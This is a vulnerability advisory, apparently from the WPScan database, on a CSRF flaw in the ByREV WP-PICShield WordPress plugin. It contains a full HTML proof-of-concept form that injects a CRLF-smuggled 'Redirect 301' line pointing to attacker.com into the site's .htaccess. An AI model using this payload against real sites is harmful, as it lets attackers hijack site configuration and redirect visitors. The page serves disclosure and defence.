ByREV WP-PICShield - Cross-Site Request Forgery (CSRF)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The ByREV WP-PICShield WordPress plugin is vulnerable to CSRF.

When updating the plugin options, several parameters in the issued POST request are written directly to the .htaccess file within the WordPress root directory. An attacker may be able to insert arbitrary lines into the .htaccess file, reconfiguring it to redirect to another website or other malicious actions.

While all plugin options can be updated by an attacker via CSRF, the following parameter values are directly inserted into .htaccess:
byhln[gtfo_key]
byhln[images_extension]
byhln[allowed_domains]
byhln[allowed_user_agents]
byhln[allowed_remote_ip]

The attached PoC demonstrates a CSRF payload which rewrites the victim's .htaccess file to redirect to an attacker-controlled website.
Proof of Concept
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://target.com/wordpress/wp-admin/options-general.php?page=byrev_picshield_admin" method="POST">
      <input type="hidden" name="byhln&#95;hidden" value="Y" />
      <input type="hidden" name="byhln&#91;wp&#45;picshield&#45;version&#93;" value="1&#46;9&#46;7" />
      <input type="hidden" name="byhln&#91;enable&#95;hotlink&#95;gtfo&#93;" value="1" />
      <input type="hidden" name="byhln&#91;gtfo&#95;key&#93;" value="csrf&#13;&#10;Redirect&#32;301&#32;&#47;&#32;http&#58;&#47;&#47;attacker&#46;com&#47;&#13;&#10;&#35;" />
      <input type="hidden" name="byhln&#91;hotlink&#95;cache&#95;folder&#93;" value="&#126;hotlink&#45;cache" />
      <input type="hidden" name="byhln&#91;image&#95;source&#95;transparency&#93;" value="65" />
      <input type="hidden" name="byhln&#91;watermark&#95;enabled&#93;" value="1" />
      <input type="hidden" name="byhln&#91;watermark&#95;pass&#95;through&#93;" value="1" />
      <input type="hidden" name="byhln&#91;watermark&#95;png&#95;file&#93;" value="watermark&#46;png" />
      <input type="hidden" name="byhln&#91;watermark&#95;position&#93;" value="0" />
      <input type="hidden" name="byhln&#91;blend&#95;bar&#95;watermark&#93;" value="1" />
      <input type="hidden" name="byhln&#91;blend&#95;bar&#95;opacity&#93;" value="25" />
      <input type="hidden" name="byhln&#91;write&#95;host&#95;source&#93;" value="1" />
      <input type="hidden" name="byhln&#91;write&#95;time&#95;cached&#95;over&#95;image&#93;" value="0" />
      <input type="hidden" name="byhln&#91;print&#95;qr&#95;host&#93;" value="0" />
      <input type="hidden" name="byhln&#91;send&#95;hotlink&#95;gtfo&#95;header&#95;signature&#93;" value="0" />
      <input type="hidden" name="byhln&#91;redirect&#95;direct&#95;link&#95;images&#95;from&#95;google&#93;" value="1" />
      <input type="hidden" name="byhln&#91;redirect&#95;404&#95;not&#95;found&#95;image&#93;" value="&#47;image&#45;not&#45;found&#47;" />
      <input type="hidden" name="byhln&#91;redirect&#95;not&#95;found&#95;image&#95;code&#93;" value="404&#32;Not&#32;Found" />
      <input type="hidden" name="byhln&#91;maximum&#95;megapixels&#95;size&#93;" value="3" />
      <input type="hidden" name="byhln&#91;images&#95;extension&#93;" value="jpg&#32;jpeg&#32;png&#32;gif" />
      <input type="hidden" name="byhln&#91;allowed&#95;domains&#93;" value="www&#46;zjulian&#46;com" />
      <input type="hidden" name="byhln&#91;allowed&#95;user&#95;agents&#93;" value="googlebot&#13;&#10;msnbot&#13;&#10;baiduspider&#13;&#10;slurp&#13;&#10;webcrawler&#13;&#10;teoma&#13;&#10;photon" />
      <input type="hidden" name="byhln&#91;allowed&#95;remote&#95;ip&#93;" value="" />
      <input type="hidden" name="byhln&#91;allow&#95;online&#95;translators&#93;" value="1" />
      <input type="hidden" name="byhln&#91;allow&#95;socials&#93;" value="1" />
      <input type="hidden" name="byhln&#91;x&#95;frame&#95;sameorgin&#93;" value="0" />
      <input type="hidden" name="byhln&#91;log&#95;referer&#95;enabled&#93;" value="0" />
      <input type="hidden" name="byhln&#91;log&#95;referer&#95;table&#93;" value="&#42;&#42;&#32;disabled&#32;&#42;&#42;" />
      <input type="hidden" name="byhln&#91;write&#95;credit&#95;plugin&#93;" value="1" />
      <input type="hidden" name="Submit" value="Update&#32;Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects

Plugin byrev-wp-picshield-hotlink-defence

References

URL http://wp-picshield.com/

Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352

Miscellaneous

Submitter Zachary Julian
Submitter Website zjulian.com
Submitter Twitter @tprime_
Views 108
Verified No
WPVDB ID 8738

Timeline

Publicly Published 2017-01-04 (8 months ago)
Added 2017-02-22 (6 months ago)
Last Updated 2017-02-22 (6 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.